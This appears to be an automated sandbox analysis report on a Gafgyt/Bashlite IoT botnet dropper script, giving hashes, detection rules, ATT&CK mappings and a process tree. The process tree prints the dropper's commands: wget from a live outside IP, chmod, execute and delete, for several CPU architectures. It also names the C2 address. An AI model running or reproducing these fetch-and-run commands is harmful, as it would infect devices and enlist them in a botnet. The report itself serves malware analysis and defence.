gafgyt | d347e32185478f56ce1c96e1e5dc3ad80ffdcf623036ca6750c60c6183a5c779

Analysis

max time kernel
37s
max time network
41s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
28-09-2024 07:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sex.sh
Size

1KB
MD5

884dc57dd0892038d53a2d4b017504df
SHA1

52ab9780591ee9718ce6188a9edafc1afa05dcdf
SHA256

d347e32185478f56ce1c96e1e5dc3ad80ffdcf623036ca6750c60c6183a5c779
SHA512

25e1afb67512005fecdf47712dfc1f0c74ecb221ed0f3904ff47f3ef30948334e31426003f6590c580024f758c7ab8576412a280b5f5ce3f787b6208037db3ca

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

205.185.127.244:23

Signatures

Detected Gafgyt variant 4 IoCs

resource	yara_rule
behavioral3/files/fstream-1.dat	family_gafgyt
behavioral3/files/fstream-2.dat	family_gafgyt
behavioral3/files/fstream-3.dat	family_gafgyt
behavioral3/files/fstream-4.dat	family_gafgyt

Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 4 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
751	chmod
762	chmod
767	chmod
772	chmod

Executes dropped EXE 4 IoCs

ioc	pid	Process
/tmp/mips	752	mips
/tmp/mipsel	763	mipsel
/tmp/sh4	768	sh4
/tmp/x86	773	x86

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
651	wget
752	mips
758	rm
759	wget
763	mipsel
765	rm

Writes file to tmp directory 4 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/mips	wget
File opened for modification	/tmp/mipsel	wget
File opened for modification	/tmp/sh4	wget
File opened for modification	/tmp/x86	wget

/tmp/sex.sh
/tmp/sex.sh
1⤵
PID:644
- /usr/bin/wget
  wget http://205.185.127.244/mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:651
- /bin/chmod
  chmod +x mips
  2⤵
  - File and Directory Permissions Modification
  PID:751
- /tmp/mips
  ./mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:752
- /bin/rm
  rm -rf mips
  2⤵
  - System Network Configuration Discovery
  PID:758
- /usr/bin/wget
  wget http://205.185.127.244/mipsel
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:759
- /bin/chmod
  chmod +x mipsel
  2⤵
  - File and Directory Permissions Modification
  PID:762
- /tmp/mipsel
  ./mipsel
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:763
- /bin/rm
  rm -rf mipsel
  2⤵
  - System Network Configuration Discovery
  PID:765
- /usr/bin/wget
  wget http://205.185.127.244/sh4
  2⤵
  - Writes file to tmp directory
  PID:766
- /bin/chmod
  chmod +x sh4
  2⤵
  - File and Directory Permissions Modification
  PID:767
- /tmp/sh4
  ./sh4
  2⤵
  - Executes dropped EXE
  PID:768
- /bin/rm
  rm -rf sh4
  2⤵
  PID:770
- /usr/bin/wget
  wget http://205.185.127.244/x86
  2⤵
  - Writes file to tmp directory
  PID:771
- /bin/chmod
  chmod +x x86
  2⤵
  - File and Directory Permissions Modification
  PID:772
- /tmp/x86
  ./x86
  2⤵
  - Executes dropped EXE
  PID:773
- /bin/rm
  rm -rf x86
  2⤵
  PID:775
- /usr/bin/wget
  wget http://205.185.127.244/arm61
  2⤵
  PID:776

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/mips

Filesize
176KB

MD5
24e07a16008a42f0a8dceb166b4b44cd

SHA1
87f80fc2998304bc8735479faa75f509a6d5db13

SHA256
c4d4bfc3fa6e216baccce64fe187d70519f11aa8ad33573cfdf1c416bbd0ad6f

SHA512
b75a61fc9584e124dbc98556e30166e379dc01ce64312a48906d8e4aed406127aeea1da5f8183e10fe0468908863f7467ac58e71f482c119300836c7c419dab5

Download Submit
/tmp/mipsel

Filesize
176KB

MD5
ac28a3dfa3ed9b815a8021a362b06607

SHA1
93455b3775f586e230d8879489f9a6062de70677

SHA256
3d9924dddeca5e712bd22e28453437b61eb95c5319e7535737a0bd7a128f30a5

SHA512
94c3aae6a3e945aac0beff504c76f454a5f2b78b88d4cd2364cb0f5608dc25183d37bf0338d4fc2966616e95cbe7ef03f34dfb910dd688ae536d9f5a66f1516e

Download Submit
/tmp/sh4

Filesize
123KB

MD5
5ec3c0e18b6fbc6e37bd611e2df8f9a4

SHA1
de10e2b7ce11ffa0bc0fcca82a489a3e6efc160d

SHA256
9b1ca4aa272007f3ae1a80932a690cd1749ab6f8f7980de0f2e5cd326573c4c6

SHA512
76f484543e43cfb33ff449439a64ae08578a7c8142393eed0219f642d7e9401ecf7efe093765be45f1c767d970cc0d280ba53264eb2a6eb7771a7055765e8b20

Download Submit
/tmp/x86

Filesize
127KB

MD5
678363120cd2661f040670b90f211243

SHA1
57d75e1c42243d08eb78623e6cdc6b066994a7ee

SHA256
cd39c6c637c039bcedc5b906e8c0e602f73c841947b429efc88ec4511d95a36a

SHA512
5a2b440135caa5656deb70f7d6274f8bc570e31c6aac4b6aac8375962db512b885afc6223a9767fc0ff7f29dc5377efa441277cb356dba1e3b5716a57f38ca55

Download Submit